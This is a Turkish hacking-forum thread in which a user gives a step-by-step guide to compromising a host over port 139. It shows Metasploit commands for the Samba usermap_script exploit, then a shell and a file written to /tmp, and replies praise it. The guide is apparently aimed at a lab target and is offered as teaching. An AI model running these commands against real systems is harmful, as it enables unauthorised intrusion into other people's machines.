THT DUYURU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Hedefe Port'tan (139) Sızalım! //"P4RS

"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.588
Konular:
486
Teşekkür (Etti):
1149
Teşekkür (Aldı):
2312
Ticaret:
(0) %
29-09-2019 23:37
#1
Hedefe Port'tan (139) Sızalım! //"P4RS
Merhabalar TürkHackTeam ailesi, port'tan sızma serimize devam ediyoruz. Seri diyorum çünkü birçok port'tan sızma konusu hazırladım bu da onlardan biri olacak. Bu konumuzda "Hedefe Port'tan (139) Sızalım!" anlatacağım. Konu başlıklarına bakalım ardından konumuza başlayalım.

Konu Başlıkları
• Port 139 Nedir Ne Görevi Vardır?
• Port 139 Nasıl Saldırılır?
• Hedefe 139. Port'tan Sızmak



Port 139 Nedir Ne Görevi Vardır?

Port 139, Netbios-ssn servisi olarak Microsoft Windows ve UNIX tabanlı sistemlerde dosya/program paylaşımı için kullanılır. Sabit disk de paylaşım şifreli olmaz ise saldırgan taraf buraya elini kolunu sallayarak girer.






Port 139 Nasıl Saldırılır?

Yerel ağda bir saldırganımız olduğunu düşünelim bu saldırgan Windows kullaınıcı bilgilerini ele geçirerek işlemler yapıyor. Bunu ele geçirirse yeni kullanıcı oluşturabilir, kullanıcı silebilir. O yüzden dikkatli olmakta fayda var






Hedefe 139. Port'tan Sızmak

Öncelikle makinemizin IP adresini öğrenelim.
Kod:
ifconfig
Makineye erişim sağlayamazsanız
Kod:
sudo netdiscover
yazarak ağı dinlemeye alırsınız ve IP adresini saptarsınız.



Daha sonra saldırgan makinemde port taraması yapmak adına Zenmap aracı ile tarama yapıyorum ve açık portlar karşıma çıkıyor. Burada Version kısmından yararlanacağız.



msfconsole açalım. Bunun için terminale
Kod:
msfconsole
yazacağız.



Daha sonra Version kısmından öğrendiğimiz veriyi yazıyoruz Samba. Arama yapmak için
Kod:
search samba
yazalım.



Gördüğünüz gibi usermap_script'i explotini bulduk bunun üzerinden işlem yapacağız.



Exploit üzerinden işlem yapmak adına
Kod:
use exploit/multi/samba/usermap_script
yazalım. Ardından ayarlarımıza bakmak adına
Kod:
show options
yazalım ve Port'umuzu 139 olarak ayarlı olduğunu gördük. Tek ayarlamamız gereken IP adresi. Onu da ayarlamak için
Kod:
set RHOSTS IP_Adresi
yazalım ve
Kod:
exploit
yazarak exploit'imizi başlatalım.



Gördüğünüz gibi direk bağlandık. Artık hedefin içerisinde gezinebiliriz.



Hatta /tmp dizinin de bir dosya oluşturalım ve içerisine "Merhabalar TürkHackTeam ailesi..." yazdıralım. Bunun için
Kod:
cd /tmp
ardından
Kod:
cat > okubeni.txt
ile .txt içine girelim ve mesajımızı yazıp CTRL + C yaparak kaydedelim.



Hedef makinemizden de bakalım ve işlemimizin gerçekleştiğine inanalım









Konum bu kadardı arkadaşlar, başka bir yazımda görüşmek üzere sağlıcakla...




Konu "P4RS tarafından (29-09-2019 23:38 Saat 23:38 ) değiştirilmiştir.
Anonymous Aze - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2019
Mesajlar:
57
Konular:
24
Teşekkür (Etti):
56
Teşekkür (Aldı):
5
Ticaret:
(0) %
30-09-2019 00:25
#2
Cevap: Hedefe Port'tan (139) Sızalım! //"P4RS
ellerine sağlık hocam mükemmel konu Hocam Ama Tam olarak anlayamadım 139 portun görevi nedir Bunu biraz detaylı anlatırsan sevinirim iyi çalışmalar dilerim
--------------------- Ben Kimim,?
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.588
Konular:
486
Teşekkür (Etti):
1149
Teşekkür (Aldı):
2312
Ticaret:
(0) %
30-09-2019 11:01
#3
Cevap: Hedefe Port'tan (139) Sızalım! //"P4RS
Alıntı:
Anonymous Aze´isimli üyeden Alıntı Mesajı göster
ellerine sağlık hocam mükemmel konu Hocam Ama Tam olarak anlayamadım 139 portun görevi nedir Bunu biraz detaylı anlatırsan sevinirim iyi çalışmalar dilerim
Şu sekidir anlatayım; sizin birçok bilgisayarınız ve yazıcınız var bir ağda diyelim. Siz bu ağda dosya paylaşımı yapacaksınız fakat tek tek yapmak istemiyorsunuz bu yüzden NETBIOS yani 139 portunu kullanıyorsunuz. Buradan tüm cihazlara dosya aktarımı ve dosya alımı yapıyorsunuz. Dışarıdan bir kisi ağınıza sizdi ve bir bakti ki 139 portu açık. Zorluk çekmeden bu posta sızar ve system32 dosyalarınıza dahi erişim sağlar. Sonrasını siz düşünün
Konu "P4RS tarafından (30-09-2019 20:07 Saat 20:07 ) değiştirilmiştir.
Anonymous Aze Teşekkür etti.
BH80 - ait Kullanıcı Resmi (Avatar)
İstihbarat Tim Lideri
Üyelik tarihi:
01/2016
Nereden:
-Türkistan-
Mesajlar:
505
Konular:
79
Teşekkür (Etti):
336
Teşekkür (Aldı):
661
Ticaret:
(0) %
30-09-2019 14:15
#4
Cevap: Hedefe Port'tan (139) Sızalım! //"P4RS
Yine güzel bir konu eline sağlık kardeşim
--------------------- İletişim için
Twitter: BH80_THT
E-posta: bh80@turkhackteam.net & root@bh80.org

SELAM SANA
EY YILLARI HEBA OLAN GENÇ!
"P4RS Teşekkür etti.
Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
395
Konular:
70
Teşekkür (Etti):
384
Teşekkür (Aldı):
242
Ticaret:
(0) %
30-09-2019 16:29
#5
Cevap: Hedefe Port'tan (139) Sızalım! //"P4RS
Yine beklendiği gibi çok güzel bir serinin çok güzel bir konusu Devamını bekliyorum.
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.588
Konular:
486
Teşekkür (Etti):
1149
Teşekkür (Aldı):
2312
Ticaret:
(0) %
30-09-2019 22:06
#6
Cevap: Hedefe Port'tan (139) Sızalım! //"P4RS
Alıntı:
BH80´isimli üyeden Alıntı Mesajı göster
Yine güzel bir konu eline sağlık kardeşim
Beğenmenize cok sevindim hocam

Alıntı:
Xowly´isimli üyeden Alıntı Mesajı göster
Yine beklendiği gibi çok güzel bir serinin çok güzel bir konusu Devamını bekliyorum.
Beğenmene çok sevindim Xowly inşallah gelecek

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler